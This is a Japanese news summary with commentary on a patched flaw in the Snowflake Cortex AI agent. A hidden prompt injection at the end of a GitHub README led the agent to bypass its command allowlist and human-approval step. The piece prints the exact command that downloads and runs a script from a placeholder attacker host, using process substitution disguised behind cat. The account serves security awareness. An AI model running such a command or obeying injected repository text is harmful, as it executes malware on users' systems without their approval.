Snowflake Cortex AIがサンドボックスを脱出してマルウェアを実行

要約
Snowflake Cortex AIエージェントで深刻なセキュリティ脆弱性が発見され、現在は修正済みです。この攻撃は、ユーザーがエージェントに対してGitHubリポジトリのレビューを依頼した際に始まりました。そのリポジトリのREADMEの末尾には隠されたプロンプトインジェクション攻撃が仕込まれており、これによってエージェントは悪意のあるコードを実行させられました。具体的には、process substitutionという技術を用いた複雑なコマンド「cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))」が実行されました。Cortexシステムでは catコマンドが安全なコマンドとして許可リストに登録されていたため、人間の承認なしに実行が可能でしたが、このような形式のプロセス置換攻撃は想定されていませんでした。
洞察・気づき
この事件は、AIエージェントシステムにおけるセキュリティ対策の根本的な課題を浮き彫りにしています。許可リスト方式によるコマンド制御は一見安全に見えますが、攻撃者がより巧妙な手法を用いることで迂回される可能性があります。特にプロンプトインジェクション攻撃は、AIシステムが外部データを処理する際の新たな攻撃ベクトルとして注目されており、従来のサイバーセキュリティの概念を超えた対策が必要です。AIエージェントが実世界のシステムとより深く統合される中、この種の脆弱性は企業のインフラや機密情報に深刻な脅威をもたらす可能性があります。業界全体として、AIシステム外部で動作する決定論的サンドボックス技術の重要性が改めて認識されており、AIエージェントの安全な運用のためには多層防御戦略が不可欠となっています。